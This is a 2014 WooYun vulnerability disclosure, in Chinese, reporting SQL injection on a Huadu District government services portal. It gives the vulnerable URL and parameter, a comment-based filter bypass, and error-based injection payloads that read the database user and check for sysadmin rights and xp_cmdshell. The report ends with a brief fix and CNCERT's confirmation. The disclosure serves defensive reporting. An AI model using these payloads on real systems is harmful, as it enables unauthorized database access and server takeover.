漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-057480
漏洞标题:花都区政务服务网SQL注入漏洞
相关厂商:花都区政务服务网
漏洞作者: greg.wu
提交时间:2014-04-29 14:51
修复时间:2014-06-13 14:51
公开时间:2014-06-13 14:51
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-04-29: 细节已通知厂商并且等待厂商处理中
2014-05-04: 厂商已经确认,细节仅向厂商公开
2014-05-14: 细节向核心白帽子及相关领域专家公开
2014-05-24: 细节向普通白帽子公开
2014-06-03: 细节向实习白帽子公开
2014-06-13: 细节向公众公开
简要描述:
花都区政务服务网对用户输入过滤不当存在多个SQL注入漏洞,sa权限,xp_cmd shell存在,很容易拿到服务器shell了
详细说明:
基本上全站到处都是注入点,虽然有简单的sql注入防护(目测是waf类设备),但还是可以轻松绕过.
其中一个注入点:
http://www.hdamo.gov.cn/login/publicpage.aspx?infotype=bmxx&InfoId=00017&dic_name=%b2%bf%c3%c5%d0%c5%cf%a2
参数InfoId存在注入,InfoId=00017%27/**/and/**/%271%27=%271时页面正常,InfoId=00017%27/**/and/**/%271%27=%272时页面异常
漏洞证明:
采用显错注入方式:
获取当前用户名为:dbo
http://www.hdamo.gov.cn/login/publicpage.aspx?infotype=bmxx&InfoId=00017%27/**/and/**/1=quotename%28user%29--%20&dic_name=%b2%bf%c3%c5%d0%c5%cf%a2
获取当前数据库为:OutPortalDB
判断权限为sa,权限很大,xp_cmd shell存在
http://www.hdamo.gov.cn/login/publicpage.aspx?infotype=bmxx&InfoId=00017%27/**/and/**/1=(select/**/IS_SRVROLEMEMBER('sysadmin'))--%20&dic_name=%b2%bf%c3%c5%d0%c5%cf%a2
http://www.hdamo.gov.cn/login/publicpage.aspx?infotype=bmxx&InfoId=00017'/**/and/**/1=(Select/**/count(*)/**/FROM master..sysobjects/**/Where/**/xtype='X'/**/AND/**/name='xp_cmdshell')-- &dic_name=%b2%bf%c3%c5%d0%c5%cf%a2
以上两个链接均正常,说明为sysadmin权限,以及xp_cmd存在
不继续深入了,怕查水表
修复方案:
过滤和参数化
版权声明:转载请注明来源 greg.wu@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2014-05-04 11:06
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心处置。按进一步可渗透风险进行评分,rank 12
最新状态:
暂无